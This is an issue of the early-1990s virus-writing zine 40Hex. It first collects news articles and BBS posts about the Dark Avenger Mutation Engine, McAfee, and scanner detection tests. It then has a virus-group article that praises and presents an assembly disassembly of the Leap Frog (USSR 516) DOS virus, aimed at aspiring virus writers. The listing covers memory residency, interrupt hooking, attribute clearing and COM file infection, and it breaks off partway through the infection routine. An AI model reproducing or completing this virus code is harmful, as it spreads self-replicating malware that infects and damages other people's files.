40Hex Number 7 Volume 2 Issue 3
40Hex Number 7 Volume 2 Issue 3 File 005
Well, by far the most incredible creation in the virus community that
has surfaced is the MtE. We aren't going to go into details about it, but
we are definately going to give you as much news as we have collected.
In this file:
Article 1: A note from Vesselin Bontchev
Article 2: Steve Gibson tells us how to avoid polymorphic viruses
Article 3: An article from Newsday about McAfee
Article 4: NIST Expert Warns Feds to Find Better Ways to Head Off Viruses
Article 5: Some messages posted on Smartnet about MtE
<<<<<<<<<<
Article 1:
<<<<<<<<<<
====From the Virus-L Digest via NIST=====
Date: 10 Feb 92 20:40:23 +0000
>From: bontchev fbihh.informatik.uni-hamburg.de (Vesselin Bontchev)
Subject: Re: DAV/Sourcer/Rape (PC)
RUTSTEIN HWS.BITNET writes:
> First, has anyone heard about Dark Avenger's latest? I got a report
> secondhand last week that he'd come up with a new gem...I believe the
> report came from a researcher in the UK. Fridrik/Vesselin/others, can
> you confirm/deny this report?
Yeah, I can confirm it... :-( And it is a first-hand information,
since I have it. The long-rumored Mutating Engine is real and is
circulated to several virus exchange BBSes... :-(( The bad news is
that the damn thing really mutates, no kidding! It comes as an OBJ
file, which is supposed to be linked to any virus, with a detailed
do-it-yourself guide, and with a demo virus. The demo virus is in
source, but the source of the Mutating Engine (called MtE) is not
provided. According to the docs, what we have is version 0.90-beta of
the MtE, but version 0.91 is also known to exist... I'm wondering what
will be implemented more in version 1.00... :-(((
The damn thing is really difficult to crack! I mean, it contains no
encryption or anti-debugging and anti-disassembling thechniques, but
it mutates too well... I have observed changing of encryption
algorithms, random bytes padding, usage of different ways to express
one and the same algorithm (yeah, that's right - different ways, not
just modifying the opcodes and inserting do-nothing instructions)...
The currently most mutating virus (V2P6Z) is a toy compared to it...
The worst of all is that just anybody can sit and use it to create a
virus. Well, some experience in assembly language programming is
needed, so the kids from RABID, NukE, and the other punk virus writing
groups that use to write overwriting viruses in high-level languages
will have a little bit of trouble to learn how to use it... But a very
little bit!
Currently there are only two viruses, which use the MtE. The first is
the demo virus in the package (a silly, non-resident, COM file
infector, infects only the files in the current directory), and a
virus, called Pogue, which has been available on some VX BBSes in the
USA. McAfee's SCAN 86-B claims to be able to detect the Pogue virus.
Unfortunately, I haven't had the time to verify this (I recieved the
virus just two days ago). There are reports that in fact not all
possible variants of the virus are detected. SCAN 86-B DOES NOT detect
the MtE for sure - I tested it on the demo virus supplied with the
package.
As a conclusion, don't panic. Currently there are only two viruses,
using the MtE and both are too silly to pose a serious threat. Copies
of the MtE have been provided to several anti-virus researchers (no,
don't write me to ask for a copy, you won't get one), including McAfee
Associates, Fridrik Skulason, Dr. Solomon, etc., so there are a lot of
people working right now on the problem. The good news is that once we
learn to recognize the MtE, we'll be able to detect -any- new viruses
that are using it.
Oh, yes, just out of interest. The whole package comes in a neat ZIP
archive, with -AV code for "CrazySoft, Inc.". The Bulgarian hackers
have demonstrated again that the -AV authenticity verification in
PKZIP is just crap, so PLEASE DO NOT RELY ON IT!
<<<<<<<<<<
Article 2:
<<<<<<<<<<
From InfoWorld Magazine
Tech Talk
by Steve Gibson
AT LAST, HOW TO PROTECT YOURSELF FROM POLYMORPHIC VIRUSES
My past two columns concerning the threat presented by polymorphic
viruses triggered an informative conversation with the industry's
chief virus researcher, John McAfee. During that conversation I
learned that things are even worse than I'd supposed.
It turns out that the "Dark Avenger" bulletin board system, which
disseminates virus code, has recently published source code for the
Dark Avenger Mutation Engine. The Mutation Engine is nothing less than
a first-class code kernel that can be tacked onto any existing or
future virus to turn it into a nearly impossible to detect
self-encrypting virus.
My examination of a sample virus encrypted by the Mutation Engine
provided by McAfee revealed alarming capabilities. Not only do the
Dark Avenger Mutation Engine viruses employ all of the capabilities I
outlined in last week's column, but they also use a sophisticated
reversible encryption algorithm generator.
The Mutation Engine uses a meta-language-driven algorithm generator
that allows it to create an infinite variety of completely original
encryption algorithms. The resulting unique algorithms are then salted
with superfluous instructions, resulting in decryption algorithms
varying from 5 to 200 bytes long.
Because McAfee has already received many otherwise known viruses
that are now encapsulated with the Mutation Engine's polymorphic
encryption, it's clear that viruses of this new breed are now
traveling among us.
It is clear that the game is forever changed; the sophistication of
the Mutation Engine is amazing and staggering. Simple pattern-matching
virus scanners will still reliably detect the several thousand
well-known viruses; however, these scanners are completely incapable
of detecting any of the growing number of viruses now being cloaked by
the Dark Avenger Mutation Engine.
So what can we ultimately do to thwart current and future software
viruses? After brainstorming through the problem with some of our
industry's brightest developers and systems architects, I've reached
several conclusions.
First, scanning for known viruses within executable program code is
fundamentally a dead end. It's the only solution we have for the
moment, but the detectors can only find the viruses they are aware of,
and new developments such as the Mutation Engine render even these
measures obsolete.
Second, detecting the reproductive proclivities of viruses on the
prowl is prone to frequent false alarms and ultimately complete
avoidance. With time the viruses will simply circumvent the detectors,
at which time the detectors will only misfire for self-modifying
benign programs.
Third, the Achilles' heel of our current DOS-based PC is its
entirely unprotected nature. As long as executable programs (such as
benign and helpful system utilities) are able to freely and directly
access and alter the operating system and its file system, our
machines will be vulnerable to deliberate attack.
So here's my recommendation.
Only a next-generation protected-mode operating system can enforce
the levels of security required to provide complete viral immunity. By
marking files and code overlays as "read and execute only" and by
prohibiting the sorts of direct file system tampering performed by our
current crop of system utilities, such operating systems will be able
to provide their client programs with complete viral immunity.
The final Achilles' heel of a protected-mode operating system is the
system boot process, before and during which it is still potentially
vulnerable. By changing the system ROM BIOS' boot priority to favor
hard disk over floppy, this last viral path can be closed and blocked
as well.
(Steve Gibson is the developer and publisher of SpinRite and
president of Gibson Research Corp., based in Irvine California....)
<<<<<<<<<<
Article 3:
<<<<<<<<<<
Date: Mon, 06 Apr 92 14:18:09 -0400
>From: Joseph Halloran
Subject: NY Newsday Article on McAfee & Viruses
(NOTE: The following article was published as a whole in the
April 5, 1992 edition of New York Newsday, page 68. It is reprinted
below without the express consent of Joshua Quittner, New York Newsday,
or the Times-Mirror Company)
SOFTWARE HARD SELL
------------------
"Are computer viruses running rampant, or is
John McAfee's antivirus campaign running amok?"
-By Joshua Quittner, staff writer
John McAfee is doing one of the things he does best: warning a
reporter about the perils of a new computer virus.
"We're into the next major nightmare -- the Dark Avenger Mutating
Engine," McAfee says, ever calm in the face of calamity. "It can
attach to any virus and make it mutate." The ability to "mutate"
makes it virtually undetectable to antivirus software, he explains.
"It's turning the virus world upside down."
But wait. This is John David McAfee, the man who once ran a service
that revolved around the curious premise that, if you paid him a member-
ship fee and tested HIV-negative, you could have AIDS-free sex with other
members for six months. This is the man who jumped from biological
viruses to computer viruses and quickly became a flamboyant expert on the
new demi-plague, showing up at the scene of infected PCs in his Winnebago
"antivirus paramedic unit."
And this is the same man who started something called the Computer
Virus Industry Association, and, as chairman, made national headlines
last month by saying that as many as _five million_ computers might be
infected with a virus named Michelangelo.
The virus turned out to be a dud, in the opinion of many industry
experts. But not before McAfee became a media magnet: In the weeks be-
fore March 6, when Michelangelo was supposed to erase the hard disks of
infected IBM and compatible PCs, he was featured by Reuters, the
Associated Press, USA Today, the Wall Street Journal, "MacNeil/Lehrer
News Hour," CNN, "Nightline," National Public Radio and "Today."
What some news reports failed to point out, however, is that McAfee
is also the man who runs Santa Clara, Calif.-based McAfee Associates,
a leading manufacturer of antivirus software, and that he stood to
benefit from publicity about Michelangelo. McAfee won't reveal sales,
but it seems clear they shot up during the two-week frenzy.
"People kept saying I hyped this, I hyped this," said McAfee, who
still defends the notion that Michelangelo was widespread. "I never
contacted the press -- they called me."
McAfee's detractors say the Michelangelo scare was mainly hype and
media manipulation, a parade in which most of the floats were built by
McAfee. They say McAfee helped drive the rush to buy antivirus soft-
ware -- with his products poised to sell the most -- while boosting the
profile of McAfee Associates, a company that recently received
$10 million from venture capitalists McAfee says are waiting to sell
stock publicly.
And, critics say, while McAfee touts a recent evaluation that rated
his software alone as 100 percent effective in finding virtually every
known virus, he funded the evaluation and picked his competitors.
"He does know the issue of viruses, no doubt about it," said Ken
Wasch, executive director of the 900-member Software Publishers Assoc-
iation. "But his tactics are designed to sell _his_ software."
McAfee says the media consistently misquoted him about how
widespread Michelangelo was. And his company didn't profit from the
virus, he says, but actually suffered due to the free advice his staff
was dispensing. "It does not benefit me in any way or shape or form
to exaggerate the virus problem."
Even McAfee's detractors admit his programs do what they're supposed
to do: track down coding that's maliciously placed in software to make it
do anything from whistle "Yankee Doodle" to erase valuable data.
His strongest distribution channel is shareware, a kind of software
honor system common on electronic bulletin boards. PC users can download
the programs over phone lines and pay later if they find them useful.
McAfee's programs are "probably the most popular shareware programs
of all time, second only to PKZIP," which compresses data, said George
Pulido, technical editor of Shareware Magazine. He said McAfee's
programs have been copied by millions of people, although only about 10
percent of shareware users actually pay.
A more reliable money-maker is corporate site licenses, where McAfee
is one of the three biggest players. Michael Schirf, sales manager of
Jetic Inc., a Vienna, Va., company that is McAfee's sales agent for the
Mid-Atlantic region, claimed more than 300 of the Fortune 500 companies
have licensed his software, paying $3,250 to $20,000, depending on the
number of PCs. During the Michelangelo scare, "you couldn't get through
to us at one point because of people asking about it and trying to get
it," Schirf said.
Certainly, McAfee's software wasn't the only antivirus software
selling. Fueled by giveaways of "special edition" programs that scanned
exclusively for the Michelangelo virus, sales of general antivirus
packages were a bonanza for everyone in the business, including Norton/
Symantec and Central Point Software, two other leading sellers.
"Our sales of antivirus software were up 3,000 percent," said Tamese
Gribble, a spokesman for Egghead Software, the largest discount software
retailer in the country. "We were absolutely swamped."
Rod Turner, a Norton executive vice president, said antivirus sales
increased fivefold. "We didn't make any product in advance," he said,
"so we were caught with our pants down." Companies like Norton that
sell factory-shipped software couldn't ramp up quickly enough to take
full advantage of the situation. But McAfee's software comes mostly
through electronic bulletin boards and sales agents, giving him a nearly
limitless capability to meet demand. "I can supply as many copies of the
software as I have blank diskettes to put it on," Schirf said.
The Michelangelo scare was also good for pay-by-the-hour on-line
information services such as Compuserve, which saw a huge increase in the
time users logged on looking for advice on Michelangelo.
Indeed, a virus forum on Compuserve was hugely popular, with users
downloading antivirus programs, including McAfee's, 49,000 times that
week, Compuserve spokesman Dave Kishler said. Compuserve made more than
$100,000 from the online time.
McAfee makes an attractive industry spokesman. Tall and lean, with a
mellifluous voice, he speaks in perfect sound bites -- an antidote to the
unquotably bland men who otherwise dominate the antivirus business.
A mathematician who got into programming when he graduated from
Roanoke College, McAfee, 47, said he has held a dozen jobs, ranging from
work on a voice-recognition board for PCs to consulting for the Brazilian
national phone company in Rio de Janeiro. His first mention in the media
was in connection with the American Association for Safe Sex Practices, a
Santa Clara club formed so that its members could engage in AIDS-free
sex. For a $22 fee, members whose blood tested HIV-negative were given
cards certifying them AIDS-free, buttons saying "Play it Safe," and were
entered on McAfee's on-line data base. Updates, every six months, cost
$7.
Anyone who knows anything about AIDS knows a certificate that someone
is AIDS-free is good only until the person has sex with or shares an
intravenous needle with an infected person.
When asked now about the safe-sex group, McAfee at first denied
anything but a passing affiliation: "I worked for those people as a con-
tractor," he said, adding, "It was not my company." But later, when he
was reminded that both the San Diego Tribune and the San Francisco
Chronicle described him in feature stories as the entrepreneur who
started the organization ("I believe I am providing an environment
where people who are sexually active can feel more safe and secure,"
he told the Tribune in a March 9, 1987, story), McAfee sidestepped the
ownership question. He said the group performed a valuable function,
maintaining a data base on AIDS and information about the disease.
"I thought they were pretty well ahead of their time," he said,
quickly locating a 1987 newsletter put out by the group, which featured
articles such as "Kissing and AIDS" and "The Apparent Racial Bias of the
AIDS Virus."
The association no longer exists. "They came and went pretty fast,"
McAfee said, chuckling.
McAfee got his first taste of computer viruses at around that time.
"It was an accident, like anything else in life," he recalled. "I got
a copy of the Pakistani Brain. I think I got it from one of the local
colleges. It was the program of the year." The program, reportedly
written by two Pakistani students trying to foil software pirates,
destroyed some PC data.
By 1989, McAfee was a virus expert, selling the first antivirus
software and offering to make house calls with his Winnebago cum computer
lab.
"John's antivirus unit is the first specially customized unit to wage
effective, on-the-spot counterattacks in the virus war," McAfee and a
co-author reported in "Computer Viruses, Worms, Data Diddlers, Killer
Programs, and Other Threats to Your System," their 1989 book. "Event-
ually, there will be many such mobile search, capture and destroy anti-
virus paramedic units deployed around the world."
He had also founded the Computer Virus Industry Association, with
himself as chairman.
"The CVIA is nothing more than McAfee," said Wasch, of the Software
Publishers Association. "I had a run-in with him three years ago about
that." Wasch said he had been asked by other antivirus businesses to
look into McAfee's group after claims surfaced that he was railroading
companies into joining -- something McAfee vigorously denies. Wasch
said he believes the assocation was a self-serving group that did
little more than support McAfee's business.
"It would be like Microsoft creating the Windows Support Association
as a front to promote its Windows software," Wasch said.
McAfee denies the CVIA is a front and said Wasch's group was
threatened by the creation of the virus association. "They wanted to
take us over," he said. In any event, he said, the association is now
managed by others and his involvement is minimal, adding, "It's more of
a nuisance to me." But he does say the association is dependent on his
private business for much of its virus data. "McAfee Associates has all
the numbers," he said.
Detractors say McAfee now uses another association to hype his
programs.
The National Computer Security Association released one of the few
ratings of antivirus software, with McAfee's program on top -- a
comparison he's quick to cite. But that may be because he influenced
which software would be compared with his and how the tests were run,
said David Stang, who founded the for-profit association in Washington,
D.C., two years ago. Stang recently left the association and started
a new one after a falling-out with McAfee over testing procedures.
Stang said one of the assocation's functions was to "certify"
antivirus software -- to test and rate competing programs. "It was his
[McAfee's] idea that we certify products," Stang said. And when no
company rushed forward to pay $500 to have its software rated, McAfee
"sent me the products and the check and said 'go certify.'"
McAfee says he spent thousands of dollars to evaluate some of his
competitors' programs. In February, 1992, in fact, he paid for his own
and the other five programs to be certified. His was ranked 100 percent
effective. The others ranged from 44 percent to 88 percent effective.
"If your product competes with mine, I'd like for those customers of
mine to know that your product isn't as good as mine," he said. But in
the February certification, notably absent were McAfee's biggest
competitors: Dr. Solomon's ToolKit and Skulason's F-Prot.
"I've got 75 competitors. I pick the ones who are going to give me
the most trouble that month," McAfee explained.
The February evaluation was actually a second, and more favorable
test, that Stang says he performed at McAfee's request. Stang said
McAfee was dissatisfied with the assocation's methods -- it tested the
software against a "library" of viruses that McAfee thought wasn't
comprehensive enough. So Stang said he agreed to use a new library that
he claims was built on viruses McAfee found and supplied. Scores for
McAfee's program rose while some others dropped sharply. McAfee said
Stang's virus library was incomplete and his testing methods "wishy-
washy," and he defended the new library's independence.
"This is not something that anybody, let alone me, could mess with,"
said McAfee. "You can't jimmy these scores. You can't say that McAfee
buys more certifications, therefore he'll get a better score, because
other vendors would complain."
"They wouldn't let me get away with it."
[John McAfee]
<<<<<<<<<<
Article 4:
<<<<<<<<<<
From: Government Computer News
March 30, 1992
By: Kevin Power, GCN staff
"NIST Expert Warns Feds to Find Better Ways to Head Off Viruses"
BALTIMORE - In the wake of the Michelangelo scare, a top security
expert with the National Institute of Standards and Technology has
warned agencies against relying too heavily on virus scanning
software.
Anti-virus software ia a useful detection tool, but it often takes
too long to use and does not solve fundamental problems, said Dennis
Steinhauer, manager of the computer security evaluation group at
NIST's Computer Systems Laboratory. He spoke at the March meeting of
the National Computer System Security and Privacy Advisory Board.
Steinauer said the fallout from Michelangelo was minimal, thanks to
early detection, plenty of publicity and governmentwide [sic]
warnings. But he also stressed that vendors and agencies need more
effective methods of protecting against viruses in newly acquired
hardware and software.
"What were believed to be reliable channels may no longer be," he
said. "There's a lot that needs to be done to make sure that users
receive better assurances that products are not contaminated. This
incident may have undermined consumer confidence."
Steinhauer said one solution would be to build hardware and
operating systems that are less vulnerable.
For example, vendors can isolate the boot sector of a hard drive to
guard against infection. But agencies tend to shy away from such
serious measures, because they force managers make hard choices about
system functionality and user requirements, Steinhauer said.
"We have the technology to do what is necessary. But we don't know
what the price is to the user," he said. "The question is whether I'm
willing to have my machine hobbled for protection. It's similar to
installing a governor on a car to limit a vehicle's speed to 55 miles
per hour."
Agencies still are surveying for possible damage inflicted by
Michelangelo, Steinhauer said. But he said the incident showed NIST
officials that more agency computer emergency response teams (CERTs)
are needed.
CERTs, established in some agencies for just such attacks, worked
well, Steinhauer said. The teams coordinate their work through the
Forum on Incident Response and Security Teams, or FIRST.
But Steinhauer said it was evident that not enough agencies have
established CERTs.
Internal agency security teams did their jobs, but the government
needs a better way to distribute security advisories and handle
less-publicized emergencies, Steinhauer said.
<<<<<<<<<<<
Article 5A:
<<<<<<<<<<<
Date: 05-29-92 (21:06) Number: 3019 of 3059 (Echo)
To: BILL LAMBDIN Refer#: NONE
From: CHARLIE MOORE Read: NO
Subj: POLYMORPHIC VIRUSES 1/2 Status: PUBLIC MESSAGE
Conf: VIRUS (52) Read Type: GENERAL (+)
Note: This message is a repost -- I tied up the first by failing
to set the lines per message < 99. My apologies to all.
Bill, regarding how McAfee's Scan detects the DAME you stated:
BL>Trust me. It is still string searches. McAfee finds those three
BL>bytes, and then follows the steps to decrypt the virus to memory. If
BL>it continues long enough to possitively identify the DAME, Scan
BL>reports the virus, and looks at the next
Now, being in the security business, and probably a bit paranoid as a
result, when I see or hear "Trust me", I get a little queezy. I don't
know the source of your information Bill (perhaps you'll let us know)
but I don't think it's correct.
On May 11, 1992, McAfee Associates was featured in a news release about
the DAME -- Dark Avenger Mutation Engine No Threat to Protected PCs.
Below is a quote from this release that does not track with what you're
telling me (BTW, it was McAfee Associates who sent me the news
release -- did not see it until today though).
The Mutation Engine, however, uses a special algorithm to
generate a completely variable decryption routine each time.
"The result is that no three bytes remain constant from one
sample to the next," said Igor Grebert, senior programmer at
McAfee Associates. "This makes detection using conventional
string-matching techniques impossible."
Now, in my last message to you I stated that I understood three bytes
did remain constant (I got this info from two sources; Hoffman's Vsum204
and tech support at Fifth Generation Systems -- I now suspect Hofman is
wrong and tech support at Fifth Generation Systems was probably just
parroting Hoffman's Vsum. As I've stated before, solid technical
information about the DAME is limited!
Today, I called Igor Grebert at McAfee Associates to verify that he was
properly quoted in the news release -- he was. Igor would not tell me
in detail how McAfee's Scan detects the DAME; however, he did assure me
that searching for a three-byte string was not the technique used.
BL>CM> I don't think anyone, not even the Dark Avenger himself, can put an
BL>CM> accurate number on the possible virus mutations generated by the
BL>Again trust me. It is mathmatics pure and simple.
BL>the DAME randomly picks a 32 bit seed. Each bit will either be a 1 or 0.
BL>... according to my scientific calculator, or 4.3 billion possible
BL>combinations in english.
BL>If the numbers above ring bells, it is binary plain and simple.
Well Bill, I'm certainly not going to argue with your calculator. :-)
However, my point was, and remains, that the possible numbers associated
with a random seed are not necessarily equal to the possible number of
mutations the DAME is capable of generating. Now, as I stated to you
in my original message, solid information on the DAME (in particular,
how it works interactively with its various segments of code) is
limited. Even the most experienced and best qualified researchers
often don't agree on certain aspects and more than a few questions
remain about the limits of variability and related issues.
Below is the latest and best info I've seen that gives some insight
into the complexity here. The message was posted on the Internet's
Virus-L Conference; its author, Vesselin Bontchev, is one of the
most highly respected virus researchers in the world.
Date: 21 May 92 22:11:43 +0000
From: bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev)
Subject: Detecting the MtE (PC)
Almost half an year has passed since the Dark Avenger's Mutating
Engine (MtE) has been made available to the anti-virus researchers.
Currently several scanners claim to detect it with "100 %
reliability". Do they really succeed however?
We decided to run some tests at the VTC. The tests are preliminary and
were performed by Morton Swimmer. The Fear virus was used (a minor
Dedicated patch) to generate 9,471 infected files. The files were
generated by the natural infection process - the reason was to also test
the randomness of the random number generator supplied with the MtE. Of
those 9,471 infected examples 3 turned out to be duplicates, which
yelded to 9,468 different instances of the virus. It also means that the
random number generator is rather good...
Those examples filled a 40 Mb disk (which didn't permit us to generate
10,000 different examples, as we wished initially). We wanted to keep
them all, in order to be able to reproduce the tests.
The three scanners were run on those virus samples. The scanners were
the three that showed best detection rate on our collection, merely
Dr. Solomon's FindVirus (version 4.15 with drivers from May 15, 1992),
Fridrik Skulason's F-Prot 2.03a, and McAfee's SCAN 89-B.
All the three scanners failed the test, each in a different way.
FindVirus showed the worst results. It did not detect 744 virus
samples (7.86 %). F-Prot did not detect 13 examples (0.14 %). SCAN did
not detect 4 examples (0.04 %). SCAN shows the best detection rate in
the case of MtE, but we also got a report for one false positive.
For the average users the above rates might appear to be high enough.
What are 4 undetected infected files when almost 10,000 infected ones
have been properly detected? Well, it does matter. When you are
looking for a particular known virus, anything below 100 % detection
means that your program fails to detect it reliably. Rmember that a
single not detected file may re-start the epidemy.
There is another thing to be concerned about. The MtE uses a 128-byte
random number generator, which means that theoretically it can exist
in 2^512 different variants. And 0.04 % of this is still quite a
CM> [Hmm... yet a different number of possible mutations?]
lot... Suppose that some virus writer runs the same tests (or even
more elaborate ones) and determines for which values of the random
number generator the virus is not detected. Then he can create a new
random number generator (the MtE provides the possibility for
user-supplied random number generators to be plugged in), which
generates -only- those values... Such a virus will not vary a lot, but
it will still mutate and -all- its mutations will escape that
particular scanner...
As I mentioned in the beginning, those were only preliminary tests. We
intend to modify the random number generator so that it will generate
consecutive (instead of random) numbers and to create a few hundreds
thousands mutations by keeping only those which a particular scanner
does NOT detect. We'll then re-run the tests for random ranges of
consecutive mutations. All we can say now is that neither of the three
scanners mentioned above is able to detect MtE-based viruses with 100
% reliability.
Currently I am aware of the existence of at least three other scanners
which claim 100 % detection of the MtE. One comes with the new version
of V-Analyst III, the second has been designed by IBM, and the third
is Dutch scanner. As soon as we get them we'll re-run the tests.
Regards,
Vesselin
----------------------End of Vesselin's Message----------------------
Bill, I'll follow up on the subsequent tests Vesselin intends to run and
report the results to you.
One thing I've learned in this business is that accurate and solid
information is sometimes hard to come by and the experts don't always
have all the answers. Although I think Vesselin's above message is
pretty solid, I also think he fails to consider something: on the one
hand, he states a theoretical 2^512 (in contrast, your number is 2^32)
different variants; yet, his empirical data produces 3 duplicate
mutations from a run of less than 10 thousand. I think this is rather
odd from a statistical perspective.
Regards,
Charlie Moore
---
<<<<<<<<<<<
Article 5B:
<<<<<<<<<<<
Date: 05-30-92 (15:08) Number: 3021 of 3059 (Echo)
To: BILL LAMBDIN Refer#: NONE
From: CHARLIE MOORE Read: NO
Subj: POLYMORPHIC VIRUSES Status: PUBLIC MESSAGE
Conf: VIRUS (52) Read Type: GENERAL (+)
Bill, here's a followup post from Vesselin regarding the DAME:
-----------------Extracted from Internet's Virus-L--------------------
Date: 27 May 92 08:44:06 +0000
From: bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev)
Subject: Re: Detecting the MtE (PC)
bontchev@fbihh.informatik.uni-hamburg.de (Vesselin Bontchev) writes:
> MtE. Of those 9,471 infected examples 3 turned out to be duplicates,
> which yelded to 9,468 different instances of the virus. It also means
Correction: a fourth duplicate has been found later. Therefore the
total number of generated different mutations used during the test is
only 9,467.
> Currently I am aware of the existence of at least three other scanners
> which claim 100 % detection of the MtE. One comes with the new version
> of V-Analyst III, the second has been designed by IBM, and the third
> is Dutch scanner. As soon as we get them we'll re-run the tests.
We tried out the Dutch scanner. Its authors were present during the
test. When they saw the results, they decided that the program is not
ready to be tested yet and promised to send us a fixed version soon...
:-)
We just received the V-Analyst III scanner; we haven't tested it yet.
As soon as the test is performed, I'll post the results.
Meanwhile we received and tested yet another scanner which claims "100%
detection of the MtE-based viruses". It is a German product, called
AntiVir IV and produced by H+BEDV. The version tested was 4.03 of May
15, 1992, beta version. It missed 584 mutations (6.17 %).
Regards,
Vesselin
- --
Vesselin Vladimirov Bontchev Virus Test Center, University of Hamburg
Tel.:+49-40-54715-224, Fax: +49-40-54715-226 Fachbereich Informatik - AGN
** PGP public key available by finger. ** Vogt-Koelln-Strasse 30, rm. 107 C
e-mail: bontchev@fbihh.informatik.uni-hamburg.de D-2000 Hamburg 54, Germany
40Hex Number 7 Volume 2 Issue 3 File 006
Virus Spotlite on: Leap Frog
It's always interesting to find new residency techniques. I suppose everyone
by now is tired of the traditional high-memory loading routine and is on the
lookout for something different. 40Hex comes to the rescue!
This virus, the "Leap Frog" or USSR 516, has one of the most unique methods
I have ever seen. I was mucking around in VSUM and noticed that it, according
to Patricia, it "installs itself in a hole in memory between MSDOS and the DOS
Stacks." She is, of course, not telling us the entire story. Leap Frog
basically latches onto and resides in a DOS disk buffer. I do not know who
the author is, but I commend him for his innovative technique. I took the
liberty of disassembling the virus which is given below. It should be an
exact byte-for-byte matchup of the original carrier file (or at least should
be extremely similar). The offsets are in their correct locations, etc, etc.
It is simple to understand and terribly efficient.
Although the coding is tight, there are some inconsistencies. For
example, I do not understand the purpose of the timing routine(int 21h/ah=30h)
in the code. I also do not understand why the author decided to infect COM
files in such an abnormal way. An interesting "feature" is the disabling of
Control-Break checking - a thoroughly unnecessary piece of code. I believe
further that the line above "findmarker" should read:
lds di,dword ptr ds:[30h*4]
In any case, the code is otherwise very, very good. It is great for studying
by newcomers and "oldtimers" alike. Things to look for:
Residency routine
Lack of extensive use of relative offsets
Use of stack frame in the interrupt handler
Critical error handler
Enjoy! Dark Angel of PHALCON/SKISM
ussr516 segment byte public
assume cs:ussr516, ds:ussr516
org 100h
; Disassembled by Dark Angel of PHALCON/SKISM
; for 40Hex Number 7 Volume 2 Issue 3
stub: db 0e9h, 0, 0
db 0e9h, 1, 0, 0
; This is where the virus really begins
start:
push ax
call beginvir
orig4 db 0cdh, 20h, 0, 0
int30store db 0, 0, 0, 0 ; Actually it's int 21h
; entry point
int21store db 0, 0, 0, 0
beginvir: pop bp ; BP -> orig4
mov si,bp
mov di,103h
add di,[di-2] ; DI -> orig4
movsw ; restore original
movsw ; 4 bytes of program
xor si,si
mov ds,si
les di,dword ptr ds:[21h*4]
mov [bp+8],di ; int21store
mov [bp+0Ah],es
lds di,dword ptr ds:[30h*4+1] ; Bug????
findmarker:
inc di
cmp word ptr [di-2],0E18Ah ; Find marker bytes
jne findmarker ; to the entry point
mov [bp+4],di ; and move to
mov [bp+6],ds ; int30store
mov ax,5252h ; Get list of lists
int 21h ; and also ID check
add bx,12h ; Already installed?
jz quitvir ; then exit
push bx
mov ah,30h ; Get DOS version
int 21h
pop bx ; bx = 12, ptr to 1st
; disk buffer
cmp al,3
je handlebuffer ; if DOS 3
ja handleDBHCH ; if > DOS 3
inc bx ; DOS 2.X, offset is 13
handlebuffer:
push ds
push bx
lds bx,dword ptr [bx] ; Get seg:off of buffer
inc si
pop di
pop es ; ES:DI->seg:off buff
mov ax,[bx] ; ptr to next buffer
cmp ax,0FFFFh ; least recently used?
jne handlebuffer ; if not, go find it
cmp si,3
jbe quitvir
stosw
stosw
jmp short movetobuffer
handleDBHCH: ; Disk Buffer Hash Chain Head array
lds si,dword ptr [bx] ; ptr to disk buffer
lodsw ; info
lodsw ; seg of disk buffer
; hash chain head array
inc ax ; second entry
mov ds,ax
xor bx,bx
mov si,bx
lodsw ; EMS page, -1 if not
; in EMS
xchg ax,di ; save in di
lodsw ; ptr to least recently
; used buffer
mov [di+2],ax ; change disk buffer
; backward offset to
; least recently used
xchg ax,di ; restore EMS page
mov [di],ax ; set to least recently
movetobuffer: ; used
mov di,bx
push ds
pop es ; ES:DI -> disk buffer
push cs
pop ds
mov cx,108h
lea si,[bp-4] ; Copy from start
rep movsw
mov ds,cx ; DS -> interrupt table
mov word ptr ds:[4*21h],0BCh ; New interrupt handler
mov word ptr ds:[4*21h+2],es ; at int21
quitvir:
push cs ; CS = DS = ES
pop es
push es
pop ds
pop ax
mov bx,ax
mov si, 100h ; set up stack for
push si ; the return to the
retn ; original program
int24:
mov al,3 ; Ignore all errors
iret
tickstore db 3 ; Why???
buffer db 3, 0, 9, 0
int21:
pushf
cli ; CP/M style call entry
call dword ptr cs:[int30store-start]
retn ; point of int 21h
int21DSDX: ; For int 21h calls
push ds ; with
lds dx,dword ptr [bp+2] ; DS:DX -> filename
call int21
pop ds
retn
cmp ax,4B00h ; Execute
je Execute
cmp ax,5252h ; ID check
je CheckID
cmp ah,30h ; DOS Version
je DosVersion
callorig21: ; Do other calls
jmp dword ptr cs:[int21store-start]
DosVersion: ; Why????? ; DOS Version
dec byte ptr cs:[tickstore-start]
jnz callorig21 ; Continue if not 0
push es
xor ax,ax
push ax
mov es,ax
mov al,es:[46Ch] ; 40h:6Ch = Timer ticks
; since midnight
and al,7 ; MOD 15
inc ax
inc ax
mov cs:[tickstore-start],al ; # 2-17
pop ax
pop es
iret
CheckID: ; ID Check
mov bx,0FFEEh ; FFEEh = -12h
iret
Execute: ; Execute
push ax ; Save registers
push cx
push es
push bx
push ds ; DS:DX -> filename
push dx ; save it on stack
push bp
mov bp,sp ; Set up stack frame
sub sp,0Ah ; Temporary variables
; [bp-A] = attributes
; [bp-8] = int 24 off
; [bp-6] = int 24 seg
; [bp-4] = file time
; [bp-2] = file date
sti
push cs
pop ds
mov ax,3301h ; Turn off ^C check
xor dl,dl ; (never turn it back
call int21 ; on. Bug???)
mov ax,3524h ; Get int 24h
call int21 ; (Critical error)
mov [bp-8],bx
mov [bp-6],es
mov dx,int24-start
mov ax,2524h ; Set to new one
call int21
mov ax,4300h ; Get attributes
call int21DSDX
jnc continue
doneinfect:
mov ax,2524h ; Restore crit error
lds dx,dword ptr [bp-8] ; handler
call int21
cli
mov sp,bp
pop bp
pop dx
pop ds
pop bx
pop es
pop cx
pop ax
jmp short callorig21 ; Call orig handler
continue:
mov [bp-0Ah],cx ; Save attributes
test cl,1 ; Check if r/o????
jz noclearattr
xor cx,cx
mov ax,4301h ; Clear attributes
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Quit on error
noclearattr:
mov ax,3D02h ; Open read/write
call int21DSDX ; Filename in DS:DX
jc doneinfect ; Exit if error
mov bx,ax
mov ax,5700h ; Save time/date
call int21
mov [bp-4],cx
mov [bp-2],dx
mov dx,buffer-start
mov cx,4
mov ah,3Fh ; Read 4 bytes to
call int21 ; buffer
jc quitinf
cmp byte ptr ds:[buffer-start],0E9h; Must start with 0E9h
jne quitinf ; Otherwise, quit
mov dx,word ptr ds:[buffer+1-start]; dx = jmploc
dec dx
xor cx,cx
mov ax,4201h ; go there
call int21
